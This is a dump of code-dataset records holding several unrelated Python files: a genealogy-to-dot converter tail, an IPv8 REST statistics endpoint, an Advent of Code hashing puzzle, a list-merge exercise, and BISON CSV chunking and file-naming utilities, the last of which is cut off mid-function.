8859-15\\\".\"\"\"),\n\n ('outputEncoding', 'str', 'UTF-8', \"\"\"encoding of the output file\nshould be UTF-8 for dot-files\"\"\"),\n)\n\n\ndef main() -> None:\n if not os.path.exists(\"ged2dotrc\"):\n sys.stderr.write(\"Fatal: ged2dotrc configuration file doesn't exist.\\nCreate a config file similar to test/screenshotrc, name it ged2dotrc and continue.\\n\")\n sys.exit(1)\n try:\n config = Config(sys.argv[1:])\n # pylint: disable=broad-except\n except (BaseException) as base_exception:\n sys.stderr.write(\"Configuration invalid? %s\\n\" % (str(base_exception)))\n sys.exit(1)\n\n if len(sys.argv) > 1 and (sys.argv[1] == \"--help\" or sys.argv[1] == \"-h\"):\n config.usage()\n sys.exit(0)\n\n model = Model(config)\n try:\n model.load(config.input)\n except (BaseException) as base_exception:\n sys.stderr.write(\"error in tree file:\\n\")\n raise base_exception\n if sys.version_info[0] < 3:\n sys.stdout = codecs.getwriter(config.outputEncoding)(sys.stdout)\n model.save(sys.stdout)\n\n\nif __name__ == \"__main__\":\n main()\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab:\n","sub_path":"ged2dot.py","file_name":"ged2dot.py","file_ext":"py","file_size_in_byte":41960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"582475828","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /Users/martijndevos/Documents/anydex-core/anydex/../pyipv8/ipv8/REST/overlays_endpoint.py\n# Compiled at: 2019-06-09 10:04:13\nfrom __future__ import absolute_import\nfrom binascii import hexlify\nfrom twisted.web import http\nfrom .base_endpoint import BaseEndpoint\nfrom ..messaging.interfaces.statistics_endpoint import StatisticsEndpoint\n\nclass OverlaysEndpoint(BaseEndpoint):\n \"\"\"\n This endpoint is responsible for handing all requests regarding the status of overlays.\n \"\"\"\n\n def __init__(self, session):\n super(OverlaysEndpoint, self).__init__()\n self.session = session\n self.putChild('statistics', OverlayStatisticsEndpoint(session))\n\n def get_overlays(self):\n overlay_stats = []\n for overlay in self.session.overlays:\n peers = overlay.get_peers()\n statistics = self.session.endpoint.get_aggregate_statistics(overlay.get_prefix()) if isinstance(self.session.endpoint, StatisticsEndpoint) else {}\n overlay_stats.append({'master_peer': hexlify(overlay.master_peer.public_key.key_to_bin()).decode('utf-8'), \n 'my_peer': hexlify(overlay.my_peer.public_key.key_to_bin()).decode('utf-8'), \n 'global_time': overlay.global_time, \n 'peers': [ str(peer) for peer in peers ], 'overlay_name': overlay.__class__.__name__, \n 'statistics': statistics})\n\n return overlay_stats\n\n def render_GET(self, request):\n return self.twisted_dumps({'overlays': self.get_overlays()})\n\n\nclass OverlayStatisticsEndpoint(BaseEndpoint):\n \"\"\"\n This endpoint is responsible for handing all requests regarding the statistics of overlays.\n \"\"\"\n\n def __init__(self, session):\n super(OverlayStatisticsEndpoint, self).__init__()\n self.session = session\n self.statistics_supported = isinstance(self.session.endpoint, StatisticsEndpoint)\n\n def get_statistics(self):\n overlay_stats = []\n for overlay in self.session.overlays:\n statistics = self.session.endpoint.get_statistics(overlay.get_prefix()) if self.statistics_supported else {}\n overlay_stats.append({overlay.__class__.__name__: self.statistics_by_name(statistics, overlay)})\n\n return overlay_stats\n\n def statistics_by_name(self, statistics, overlay):\n named_statistics = {}\n for message_id, network_stats in statistics.items():\n if overlay.decode_map.get(chr(message_id)):\n mapped_name = str(message_id) + ':' + overlay.decode_map[chr(message_id)].__name__\n else:\n mapped_name = str(message_id) + ':unknown'\n mapped_value = network_stats.to_dict()\n named_statistics[mapped_name] = mapped_value\n\n return named_statistics\n\n def render_GET(self, _):\n return self.twisted_dumps({'statistics': self.get_statistics()})\n\n def render_POST(self, request):\n \"\"\"\n .. http:post:: /overlays/statistics\n\n A POST request to this endpoint will enable statistics on the given overlay.\n - enable: whether to enable or disable the statistics (True/False)\n - overlay_name: class name of the overlay\n - all: if set to True, update applies to all overlays\n\n **Example request**:\n\n .. sourcecode:: none\n\n curl -X PUT http://localhost:8085/ipv8/overlays/statistics\n --data \"enable=True&overlay_name=overlay_name&all=True\n\n **Example response**:\n\n .. sourcecode:: javascript\n\n {\"success\": True}\n \"\"\"\n if not self.statistics_supported:\n request.setResponseCode(http.PRECONDITION_FAILED)\n return self.twisted_dumps({'success': False, 'error': 'StatisticsEndpoint is not enabled.'})\n else:\n all_overlays = False\n overlay_name = None\n if 'enable' not in request.args or not request.args['enable']:\n request.setResponseCode(http.BAD_REQUEST)\n return self.twisted_dumps({'success': False, 'error': \"Parameter 'enable' is required\"})\n enable = request.args['enable'][0] == 'True'\n if 'all' in request.args and request.args['all']:\n all_overlays = request.args['all'][0] == 'True'\n elif 'overlay_name' in request.args and request.args['overlay_name']:\n overlay_name = request.args['overlay_name'][0]\n else:\n request.setResponseCode(http.PRECONDITION_FAILED)\n return self.twisted_dumps({'success': False, 'error': \"Parameter 'all' or 'overlay_name' is required\"})\n self.enable_overlay_statistics(enable=enable, class_name=overlay_name, all_overlays=all_overlays)\n return self.twisted_dumps({'success': True})\n\n def enable_overlay_statistics(self, enable=False, class_name=None, all_overlays=False):\n if all_overlays:\n for overlay in self.session.overlays:\n self.session.endpoint.enable_community_statistics(overlay.get_prefix(), enable)\n\n elif class_name:\n for overlay in self.session.overlays:\n if overlay.__class__.__name__ == class_name:\n self.session.endpoint.enable_community_statistics(overlay.get_prefix(), enable)","sub_path":"pycfiles/anyencoder-0.0.3.tar/overlays_endpoint.py","file_name":"overlays_endpoint.py","file_ext":"py","file_size_in_byte":5507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"36711616","text":"# coding=utf-8\n\"\"\"Advent of Code 2016, Day 14, Part 2\"\"\"\n\nimport hashlib\n\n\ndef get_hash(string):\n \"\"\"\n Calculate the MD5 hash of a given string, repeated 2017 times.\n :param string: the given string\n :return: hexadecimal hash of the string\n \"\"\"\n for _ in range(2017):\n string = hashlib.md5(string.encode()).hexdigest()\n return string\n\n\ndef get_repeating_sequence(string):\n \"\"\"\n Determine the first thrice-repeating character within a string.\n :param string: the given string\n :return: the repeating character if it exists; None otherwise\n \"\"\"\n for position in range(len(string) - 2):\n sequence = string[position:position+3]\n if sequence == string[position] * 3:\n return sequence[0]\n return None\n\nwith open(\"input.txt\") as f:\n salt = f.read().rstrip(\"\\n\")\n\nhashes = []\nkey_indexes = []\n\nfor i in range(1000):\n hashes.append(get_hash(salt + str(i)))\n\nindex = 0\nwhile len(key_indexes) < 64:\n hashes.append(get_hash(salt + str(index+1000)))\n candidate_key = hashes[index]\n candidate_character = get_repeating_sequence(candidate_key)\n if candidate_character:\n extended_sequence = candidate_character * 5\n if any(extended_sequence in hashed_string for hashed_string in hashes[index+1:index+1001]):\n key_indexes.append(index)\n index += 1\n\nprint(key_indexes[-1])\n","sub_path":"14/14b.py","file_name":"14b.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"138269615","text":"\"\"\"\nGiven two lists that are sorted,\nmerge both of them in ascending order\n\"\"\"\n\ndef mergeSortedLists(l1,l2):\n\n final = []\n \"\"\"\n if l1 is empty -> ret l2\n else if l2 is empty -> ret l1\n else if they're both empty -> ret []\n \"\"\"\n if len(l1) == 0:\n return l2\n elif len(l2) == 0:\n return l1\n elif len(l1) == 0 and len(l2) == 0:\n return final\n\n # set first element of the new list\n if l1[0] < l2[0]:\n final.append(l1.pop(0))\n else:\n final.append(l2.pop(0))\n\n # iterate through both lists and insert\n # in order of the new list\n while len(l1) != 0 or len(l2) != 0:\n if len(l1) == 0:\n while len(l2) != 0:\n final.append(l2.pop(0))\n elif len(l2) == 0:\n while len(l1) != 0:\n final.append(l1.pop(0))\n else:\n if l1[0] < l2[0]:\n final.append(l1.pop(0))\n else:\n final.append(l2.pop(0))\n return final\n\nl1 = [1,3,6,199,500]\n\nl2 = [-312,4,8,16,85,654,700,999]\n\nprint(mergeSortedLists(l1,l2))\n","sub_path":"mergelist.py","file_name":"mergelist.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"9335353","text":"\"\"\"Common file handling tools used in various BISON modules.\"\"\"\nimport csv\nimport glob\nimport logging\nimport math\nimport os\nimport subprocess\nimport sys\n\nfrom bison.common.constants import (DWC_PROCESS, ENCODING, EXTRA_CSV_FIELD, GBIF)\n\n\n# ...............................................\ndef delete_file(file_name, delete_dir=False):\n \"\"\"Delete file if it exists, optionally delete newly empty directory.\n\n Args:\n file_name (str): full path to the file to delete\n delete_dir (bool): flag - True to delete parent directory if it becomes empty\n\n Returns:\n True if file was not found, or file (and optional newly-empty parent directories) was successfully deleted.\n False if failed to delete file (and parent directories).\n \"\"\"\n success = True\n msg = ''\n if file_name is None:\n msg = \"Cannot delete file 'None'\"\n else:\n pth, _ = os.path.split(file_name)\n if file_name is not None and os.path.exists(file_name):\n try:\n os.remove(file_name)\n except Exception as e:\n success = False\n msg = 'Failed to remove {}, {}'.format(file_name, str(e))\n if delete_dir and len(os.listdir(pth)) == 0:\n try:\n os.removedirs(pth)\n except Exception as e:\n success = False\n msg = 'Failed to remove {}, {}'.format(pth, str(e))\n return success, msg\n\n\n# ...............................................\ndef ready_filename(fullfilename, overwrite=True):\n \"\"\"Delete file if it exists, optionally delete newly empty directory.\n\n Args:\n fullfilename (str): full path of the file to check\n overwrite (bool): flag indicating whether to delete the file if it already exists\n\n Returns:\n True if file was not found, or file (and optional newly-empty parent directories) was successfully deleted.\n False if failed to delete file (and parent directories).\n\n Raises:\n PermissionError: if unable to delete existing file when overwrite is true\n Exception: on other delete errors or failure to create directories\n PermissionError: if unable to create missing directories\n Exception: on other mkdir errors\n Exception: on failure to create directories\n \"\"\"\n is_ready = True\n if os.path.exists(fullfilename):\n if overwrite:\n try:\n delete_file(fullfilename)\n except PermissionError:\n raise\n except Exception as e:\n raise Exception('Unable to delete {} ({})'.format(fullfilename, e))\n else:\n is_ready = False\n else:\n pth, _ = os.path.split(fullfilename)\n try:\n os.makedirs(pth)\n except FileExistsError:\n pass\n except PermissionError:\n raise\n except Exception:\n raise\n\n if not os.path.isdir(pth):\n raise Exception('Failed to create directories {}'.format(pth))\n\n return is_ready\n\n\n# .............................................................................\ndef get_csv_writer(datafile, delimiter, header=None, fmode=\"w\", overwrite=True):\n \"\"\"Create a CSV writer.\n\n Args:\n datafile: output CSV file for writing\n delimiter: field separator\n header: list of fieldnames to be written as the first line\n fmode: Write ('w') or append ('a')\n overwrite (bool): True to delete an existing file before write\n\n Returns:\n writer (csv.writer) ready to write\n f (file handle)\n\n Raises:\n Exception: on failure to create a csv writer\n FileExistsError: on existing file if overwrite is False\n \"\"\"\n if fmode not in (\"w\", \"a\"):\n raise Exception(\"File mode must be 'w' (write) or 'a' (append)\")\n\n if ready_filename(datafile, overwrite=overwrite):\n csv.field_size_limit(sys.maxsize)\n try:\n f = open(datafile, fmode, newline=\"\", encoding=ENCODING)\n writer = csv.writer(f, delimiter=delimiter, quoting=csv.QUOTE_MINIMAL)\n if header is not None:\n writer.writerow(header)\n except Exception as e:\n raise e\n else:\n raise FileExistsError\n\n return writer, f\n\n\n# .............................................................................\ndef get_csv_dict_writer(csvfile, header, delimiter, fmode=\"w\", encoding=ENCODING, extrasaction=\"ignore\", overwrite=True):\n \"\"\"Create a CSV dictionary writer and write the header.\n\n Args:\n csvfile (str): output CSV filename for writing\n header (list): header for output file\n delimiter (str): field separator\n fmode (str): Write ('w') or append ('a')\n encoding (str): Encoding for output file\n extrasaction (str): Action to take if there are fields in a record dictionary not present in fieldnames\n overwrite (bool): True to delete an existing file before write\n\n Returns:\n writer (csv.DictWriter) ready to write\n f (file handle)\n\n Raises:\n Exception: on invalid file mode\n Exception: on failure to create a DictWriter\n FileExistsError: on existing file if overwrite is False\n \"\"\"\n if fmode not in (\"w\", \"a\"):\n raise Exception(\"File mode must be 'w' (write) or 'a' (append)\")\n if ready_filename(csvfile, overwrite=overwrite):\n csv.field_size_limit(sys.maxsize)\n try:\n f = open(csvfile, fmode, newline=\"\", encoding=encoding)\n writer = csv.DictWriter(f, fieldnames=header, delimiter=delimiter, extrasaction=extrasaction)\n except Exception as e:\n raise e\n else:\n writer.writeheader()\n return writer, f\n else:\n raise FileExistsError\n\n\n# .............................................................................\ndef get_csv_dict_reader(\n csvfile, delimiter, fieldnames=None, encoding=ENCODING, quote_none=False,\n restkey=EXTRA_CSV_FIELD):\n \"\"\"Create a CSV dictionary reader from a file with the first line containing fieldnames.\n\n Args:\n csvfile (str): output CSV file for reading\n delimiter (char): delimiter between fields\n fieldnames (list): strings with corrected fieldnames, cleaned of illegal characters, for use with records.\n encoding (str): type of encoding\n quote_none (bool): True opens csvfile with QUOTE_NONE, False opens with QUOTE_MINIMAL\n restkey (str): fieldname for extra fields in a record not present in header\n\n Returns:\n rdr (csv.DictReader): DictReader ready to read\n f (object): open file handle\n\n Raises:\n FileNotFoundError: on missing csvfile\n PermissionError: on improper permissions on csvfile\n \"\"\"\n csv.field_size_limit(sys.maxsize)\n\n if quote_none is True:\n quoting = csv.QUOTE_NONE\n else:\n quoting = csv.QUOTE_MINIMAL\n\n try:\n # If csvfile is a file object, it should be opened with newline=\"\"\n f = open(csvfile, \"r\", newline=\"\", encoding=encoding)\n except FileNotFoundError:\n raise\n except PermissionError:\n raise\n\n if fieldnames is not None:\n rdr = csv.DictReader(f, fieldnames=fieldnames, quoting=quoting, delimiter=delimiter, restkey=restkey)\n else:\n rdr = csv.DictReader(f, quoting=quoting, delimiter=delimiter, restkey=restkey)\n\n return rdr, f\n\n\n# .............................................................................\ndef _check_existence(filename_or_pattern):\n is_pattern = True\n # Wildcards?\n try:\n filename_or_pattern.index(\"*\")\n except ValueError:\n try:\n filename_or_pattern.index(\"?\")\n except ValueError:\n is_pattern = False\n if is_pattern:\n files = glob.glob(filename_or_pattern)\n if len(files) == 0:\n raise FileNotFoundError(f\"No files match the pattern {filename_or_pattern}\")\n elif not os.path.exists(filename_or_pattern):\n raise FileNotFoundError(f\"File {filename_or_pattern} does not exist\")\n\n return is_pattern\n\n\n# .............................................................................\ndef _parse_wc_output(subproc_output):\n # Return has list of byte-strings, the first contains one or more output lines, the last byte-string is empty.\n # Multiple matching files will produce multiple lines, with total on the last line\n output = subproc_output[0]\n lines = output.split(b\"\\n\")\n # The last line is empty\n lines = lines[:-1]\n line_of_interest = None\n # Find and split line of interest\n if len(lines) == 1:\n line_of_interest = lines[0]\n else:\n for ln in lines:\n try:\n ln.index(b\"total\")\n except ValueError:\n pass\n else:\n line_of_interest = ln\n if line_of_interest is None:\n raise Exception(f\"Failed to get line with results from {subproc_output}\")\n elts = line_of_interest.strip().split(b\" \")\n # Count is first element in line\n tmp = elts[0]\n try:\n line_count = int(tmp)\n except ValueError:\n raise Exception(f\"First element on results line {line_of_interest} is not an integer\")\n return line_count\n\n\n# .............................................................................\ndef _parse_cat_output(subproc_output):\n # Return has list of byte-strings, the first contains one or more output lines, the last byte-string is empty.\n # Multiple matching files will produce multiple lines, with total on the last line\n output = subproc_output[0]\n lines = output.split(b\"\\n\")\n line_of_interest = lines[0]\n if line_of_interest is None:\n raise Exception(f\"Failed to get line with results from {subproc_output}\")\n elts = line_of_interest.strip().split(b\"\\t\")\n # Count is first element in line\n tmp = elts[0]\n try:\n line_count = int(tmp)\n except ValueError:\n raise Exception(f\"First element on results line {line_of_interest} is not an integer\")\n return line_count\n\n\n# .............................................................................\ndef count_lines(filename_or_pattern, grep_strings=None):\n \"\"\"Find total number of lines in a file.\n\n Args:\n filename_or_pattern (str): filepath, with or without wildcards, to count lines for\n grep_strings (list): list of strings to find in lines\n\n Returns:\n line_count (int): number of lines in the file containing all of the strings in str_list\n\n Raises:\n FileNotFoundError: file pattern matches no files\n FileNotFoundError: file does not exist\n\n Assumptions:\n Existence of the command line tool \"grep\".\n Existence of the command line tool \"wc\"\n Output of \"wc\" consists of one or more lines with the pattern: \n If more than one file is being examined, the last line will have the pattern: total\n \"\"\"\n line_count = None\n try:\n _check_existence(filename_or_pattern)\n except FileNotFoundError:\n raise\n\n # Assemble bash command\n if grep_strings is not None:\n # start with grep command\n st = grep_strings.pop(0)\n cmd = f\"grep {st} {filename_or_pattern} | \"\n # add additional grep commands\n while len(grep_strings) > 0:\n st = grep_strings.pop(0)\n cmd += f\"grep {st} | \"\n # count output produced from greps\n cmd += \"wc -l\"\n else:\n # count all lines\n cmd = f\"wc -l {filename_or_pattern}\"\n\n # Run command in a shell\n sp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n sp_outs = sp.communicate()\n\n # Retrieve the total count\n line_count = _parse_wc_output(sp_outs)\n\n return line_count\n\n\n# .............................................................................\ndef count_lines_with_cat(filename_or_pattern):\n \"\"\"Find total number of lines in a file.\n\n Args:\n filename_or_pattern (str): filepath, with or without wildcards, to count lines for\n\n Returns:\n line_count (int): number of lines in the file\n\n Raises:\n FileNotFoundError: file pattern matches no files\n FileNotFoundError: file does not exist\n\n Assumptions:\n Existence of the command line tool \"cat\".\n Existence of the command line tool \"tail\"\n \"\"\"\n line_count = None\n try:\n _check_existence(filename_or_pattern)\n except FileNotFoundError:\n raise\n cmd = f\"cat -n {filename_or_pattern} | tail -n1\"\n\n # Run command in a shell\n sp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n sp_outs = sp.communicate()\n\n # Retrieve the total count\n line_count = _parse_cat_output(sp_outs)\n\n return line_count\n\n\n# .............................................................................\ndef available_cpu_count():\n \"\"\"Number of available virtual or physical CPUs on this system.\n\n Returns:\n int for the number of CPUs available\n\n Raises:\n Exception: on failure of all CPU count queries.\n\n Notes:\n code from https://stackoverflow.com/questions/1006289\n \"\"\"\n # Python 2.6+\n try:\n import multiprocessing\n return multiprocessing.cpu_count()\n except (ImportError, NotImplementedError):\n pass\n\n # https://github.com/giampaolo/psutil\n try:\n import psutil\n return psutil.cpu_count() # psutil.NUM_CPUS on old versions\n except (ImportError, AttributeError):\n pass\n\n # POSIX\n try:\n res = int(os.sysconf('SC_NPROCESSORS_ONLN'))\n if res > 0:\n return res\n except (AttributeError, ValueError):\n pass\n\n # Windows\n try:\n res = int(os.environ['NUMBER_OF_PROCESSORS'])\n if res > 0:\n return res\n except (KeyError, ValueError):\n pass\n\n # Linux\n try:\n res = open('/proc/cpuinfo').read().count('processor\\t:')\n if res > 0:\n return res\n except IOError:\n pass\n\n raise Exception('Can not determine number of CPUs on this system')\n\n\n# .............................................................................\ndef get_fields_from_header(csvfile, delimiter=GBIF.DWCA_DELIMITER, encoding=\"utf-8\"):\n \"\"\"Find fields in a header in a delimited text file.\n\n Args:\n csvfile (str): comma/tab-delimited file with header\n delimiter (str): single character delimiter between fields\n encoding (str): encoding of the file\n\n Returns:\n list: of strings indicating fieldnames\n\n Raises:\n FileNotFoundError: file does not exist\n Exception: unknown read error\n \"\"\"\n fields = []\n try:\n _check_existence(csvfile)\n except FileNotFoundError:\n raise\n\n # Open file and read first line\n try:\n f = open(csvfile, \"r\", newline=\"\", encoding=encoding)\n line = f.readline()\n line = line.strip()\n fields = line.split(delimiter)\n except Exception:\n raise\n finally:\n f.close()\n\n return fields\n\n\n# .............................................................................\nclass Chunker():\n @classmethod\n def identify_chunks(cls, big_csv_filename, chunk_count=0):\n \"\"\"Determine the start and stop lines in a large file that will make up the contents of smaller subsets of the file.\n\n The purpose of chunking the files is to split the large file into more manageable chunks that can be processed\n concurrently by the CPUs on the local machine.\n\n Args:\n big_csv_filename (str): Full path to the original large CSV file of records\n chunk_count (int): Number of smaller files to split large file into. Defaults\n to the number of available CPUs minus 2.\n\n Returns:\n start_stop_pairs: a list of tuples, containing pairs of line numbers in the original file that will be the first\n and last record of a subset chunk of the file.\n \"\"\"\n if chunk_count == 0:\n chunk_count = available_cpu_count() - 2\n start_stop_pairs = []\n\n # in_base_filename, ext = os.path.splitext(big_csv_filename)\n if big_csv_filename.endswith(GBIF.INPUT_DATA):\n # shortcut\n rec_count = GBIF.INPUT_RECORD_COUNT\n else:\n rec_count = count_lines(big_csv_filename) - 1\n chunk_size = math.ceil(rec_count / chunk_count)\n\n start = 1\n stop = chunk_size\n start_stop_pairs.append((start, stop))\n\n while stop < rec_count:\n # chunk_filename = f\"{in_base_filename}_chunk-{start}-{stop}{ext}\"\n\n # Advance for next chunk\n start = stop + 1\n stop = min((start + chunk_size - 1), rec_count)\n start_stop_pairs.append((start, stop))\n\n return start_stop_pairs, rec_count, chunk_size\n\n # .............................................................................\n @classmethod\n def identify_chunk_files(cls, big_csv_filename, chunk_count=0):\n \"\"\"Construct filenames for smaller files subset from a large file.\n\n Args:\n big_csv_filename (str): Full path to the original large CSV file of records\n chunk_count (int): Number of smaller files to split large file into. Defaults\n to the number of available CPUs minus 2.\n\n Returns:\n chunk_filenames: a list of chunk filenames\n \"\"\"\n chunk_filenames = []\n in_base_filename, ext = os.path.splitext(big_csv_filename)\n boundary_pairs, _rec_count, _chunk_size = cls.identify_chunks(\n big_csv_filename, chunk_count=chunk_count)\n for (start, stop) in boundary_pairs:\n chunk_fname = BisonNameOp.get_chunk_filename(\n in_base_filename, ext, start, stop)\n chunk_filenames.append(chunk_fname)\n return chunk_filenames\n\n # .............................................................................\n @classmethod\n def chunk_files(cls, big_csv_filename, output_path, logger, chunk_count=0):\n \"\"\"Split a large input csv file into multiple smaller input csv files.\n\n Args:\n big_csv_filename (str): Full path to the original large CSV file of records\n output_path (str): Destination directory for chunked files.\n logger (object): logger for writing messages to file and console\n chunk_count (int): Number of smaller files to split large file into. Defaults\n to the number of available CPUs minus 2.\n\n Returns:\n chunk_filenames: a list of chunk filenames\n\n Raises:\n Exception: on failure to open or write to a chunk file\n Exception: on failure to open or read the big_csv_filename\n\n Note:\n Write chunk file records exactly as read, no corrections applied.\n \"\"\"\n refname = \"chunk_files\"\n inpath, base_filename = os.path.split(big_csv_filename)\n basename, ext = os.path.splitext(base_filename)\n chunk_filenames = []\n boundary_pairs, rec_count, chunk_size = cls.identify_chunks(\n big_csv_filename, chunk_count=chunk_count)\n\n try:\n bigf = open(big_csv_filename, 'r', newline=\"\", encoding='utf-8')\n header = bigf.readline()\n line = bigf.readline()\n big_recno = 1\n\n for (start, stop) in boundary_pairs:\n chunk_basefilename = BisonNameOp.get_chunk_filename(\n basename, ext, start, stop)\n chunk_fname = os.path.join(output_path, chunk_basefilename)\n\n try:\n # Start writing the smaller file\n chunkf = open(chunk_fname, 'w', newline=\"\", encoding='utf-8')\n chunkf.write('{}'.format(header))\n\n while big_recno <= stop and line:\n try:\n # Write last line to chunk file\n chunkf.write(f\"{line}\")\n except Exception as e:\n # Log error and move on\n logger.log(\n f\"Failed on bigfile {big_csv_filename} line number \"\n f\"{big_recno} writing to {chunk_fname}: {e}\",\n refname=refname, log_level=logging.ERROR)\n # If bigfile still has lines, get next one\n if line:\n line = bigf.readline()\n big_recno += 1\n else:\n big_recno = stop + 1\n\n except Exception as e:\n print(f\"Failed opening or writing to {chunk_fname}: {e}\")\n raise\n finally:\n # After got to stop, close and add filename to list\n chunkf.close()\n logger.log(\n f\"Wrote lines {start} to {stop} to {chunk_fname}\", refname=refname)\n chunk_filenames.append(chunk_fname)\n\n except Exception as e:\n logger.log(\n f\"Failed to read bigfile {big_csv_filename}: {e}\", refname=refname,\n log_level=logging.ERROR)\n raise\n finally:\n bigf.close()\n report = {\n \"large_filename\": big_csv_filename,\n \"chunked_files\": chunk_filenames,\n \"record_count\": rec_count,\n \"chunk_size\": chunk_size\n }\n\n return chunk_filenames, report\n\n\n# .............................................................................\nclass BisonNameOp():\n\n @staticmethod\n def get_annotated_riis_filename(input_riis_filename, outpath=None):\n \"\"\"Construct a filename for a chunk of CSV records.\n\n Args:\n input_riis_filename (str): full filename of the original RIIS data.\n outpath (str): destination directory for the annotated RIIS data. Defaults\n to the same path as the input file if not provided.\n\n Returns:\n out_filename: full filename for the output file.\n \"\"\"\n basename, ext = os.path.splitext(os.path.split(input_riis_filename)[1])\n out_filename = os.path.join(outpath, f\"{basename}_annotated.csv\")\n return out_filename\n\n @staticmethod\n def get_chunk_filename(basename, ext, start, stop):\n \"\"\"Construct a filename for a chunk of CSV records.\n\n Args:\n basename (str): base filename of the original large CSV data.\n ext (str): extension of the filename\n start (int): record number in original file of first record for data chunk.\n stop (int): record number in original file of last record for data chunk.\n\n Returns:\n str: base filename for the subset file.\n\n Note:\n File will always start with basename,\n followed by chunk\n followed by process step completed (if any)\n \"\"\"\n postfix = DWC_PROCESS.CHUNK['postfix']\n sep = DWC_PROCESS.SEP\n chunkfix = f\"{DWC_PROCESS.CHUNK['prefix']}-{start}-{stop}\"\n return f\"{basename}{sep}{chunkfix}{sep}{postfix}{ext}\"\n\n # .............................................................................\n @staticmethod\n def get_out_process_filename(in_filename, outpath=None, step_or_process=None):\n \"\"\"Construct output filename for the next processing step of the given file.\n\n Args:\n in_filename (str): base or full filename of CSV data.\n outpath (str): destination directory for output filename\n step_or_process (int or lmbison.common.constants.DWC_PROCESS):\n stage of processing completed on the output file.\n\n Returns:\n out_fname: base or full filename of output file, given the input filename.\n If the input filename reflects the final processing step, the method\n returns None\n\n Raises:\n Exception: on illegal step or final process as input filename\n\n Note:\n The input filename is parsed for process step, and the output filename will\n be constructed for the next step.\n\n File will always start with basename, followed by chunk,\n followed by process step completed (if any)\n \"\"\"\n outfname = None\n path, basename, ext, chunk, postfix = BisonNameOp.parse_process_filename(\n in_filename)\n if chunk is not None:\n basename = f\"{basename}{DWC_PROCESS.SEP}{chunk}\"\n # If step is not provided, get the step after that of the input file.\n if step_or_process is None:\n step_or_process = DWC_PROCESS.get_step(postfix) + 1\n new_postfix = DWC_PROCESS.get_postfix(step_or_process)\n if new_postfix is None:\n raise Exception(\n f\"No next step for {in_filename} or processing step for \"\n f\"{step_or_process}\")\n else:\n outbasename = f\"{basename}{DWC_PROCESS.SEP}{new_postfix}{ext}\"\n # If outpath is not provided, use the same path as the input file.\n if outpath is None:\n outpath = path\n outfname = os.path.join(outpath, outbasename)\n return outfname\n\n # .............................................................................\n @staticmethod\n def parse_process_filename(filename):\n \"\"\"Parse a filename into path, basename, chunk, processing step, extension.\n\n Args:\n filename (str): A filename used in processing\n\n Returns:\n path: file path of the filename, if included\n basename: basename of the filename\n ext: extension of the filename\n chunk: the chunk string, chunk--, where start and stop indicate\n the record (line+1) numbers in the original datafile.\n process_postfix: the postfix of the file, indicating which stage of\n processing has been completed.\n\n Note:\n File will always start with basename,\n followed by chunk (if chunked)\n followed by process step completed (if any)\n \"\"\"\n chunk = None\n process_postfix = None\n # path will be None if filename is basefilename\n path, fname = os.path.split(filename)\n basefname, ext = os.path.splitext(fname)\n parts = basefname.split(DWC_PROCESS.SEP)\n # File will always start with basename\n basename = parts.pop(0)\n if len(parts) >= 1:\n p = parts.pop(0)\n # if chunk exists\n if not p.startswith(DWC_PROCESS.CHUNK[\"prefix\"]):\n process_postfix = p\n else:\n chunk = p\n if len(parts) >= 1:\n process_postfix = parts.pop(0)\n return path, basename, ext, chunk, process_postfix\n\n # ...............................................\n @classmethod\n def get_raw_summary_name(cls, csvfile):\n \"\"\"Construct a filename for the summarized version of annotated csvfile.\n\n Args:\n csvfile (str): full filename used to construct an annotated filename for\n this data.\n\n Returns:\n outfname: output filename derived from the annotated GBIF DWC filename\n \"\"\"\n basename, ext = os.path.splitext(csvfile)\n outfname = f\"{basename}_summary{ext}\"\n return outfname\n\n # ...............................................\n @classmethod\n def get_combined_summary_name(cls, csvfile, outpath=None):\n \"\"\"Construct a filename for the summarized version of annotated csvfile.\n\n Args:\n csvfile (str): full filename of one subset summary file (of one or more) for\n this data.\n outpath (str): full directory path for output filename.\n\n Returns:\n outfname: output filename derived from the summarized GBIF DWC filename\n \"\"\"\n path, basename, ext, chunk, postfix = BisonNameOp.parse_process_filename(\n csvfile)\n postfix = DWC_PROCESS.COMBINE[\"postfix\"]\n outbasename = f\"{basename}{DWC_PROCESS.SEP}{postfix}{ext}\"\n # If outpath is not provided, use the same path as the input file.\n if outpath is None:\n outpath = path\n outfname = os.path.join(outpath, outbasename)\n return outfname\n\n # ...............................................\n @staticmethod\n def get_location_summary_name(outpath, region_type, region):\n \"\"\"Construct a filename for the summary file for a region.\n\n Args:\n outpath (str): full directory path for output filename.\n region_type (str): file prefix indicating region type\n region (str): name of region\n\n Returns:\n outfname: output filename derived from the state and county\n \"\"\"\n basename = f\"{region_type}_{region}.csv\"\n outfname = os.path.join(outpath, basename)\n return outfname\n\n # ...............................................\n @staticmethod\n def get_assessment_summary_name(csvfile, outpath):\n \"\"\"Construct a filename for the RIIS assessment summary file.\n\n Args:\n csvfile (str): full filename of one subset summary file (of one or more) for\n this data.\n outpath (str): full directory path for output filename.\n\n Returns:\n outfname: output filename\n \"\"\"\n _path, basename, ext, _chunk, _postfix = BisonNameOp.parse_process_filename(\n csvfile)\n outfname = os.path.join(outpath, f\"{basename}_riis_summary{ext}\")\n return outfname\n\n # # ...............................................\n # @staticmethod\n # def parse_location_summary_name(csvfile):\n # \"\"\"Construct a filename for the summarized version of csvfile.\n #\n # Args:\n # csvfile (str): full filename used to construct an annotated filename\n # for this data.\n #\n # Returns:\n # outfname: output filename derived from the annotated GBIF DWC filename\n #\n # Raises:\n # Exception: on filename does not start with \"state_\" or \"county_\"\n # \"\"\"\n # county = None\n # _, basefilename = os.path.split(csvfile)\n # basename, ext = 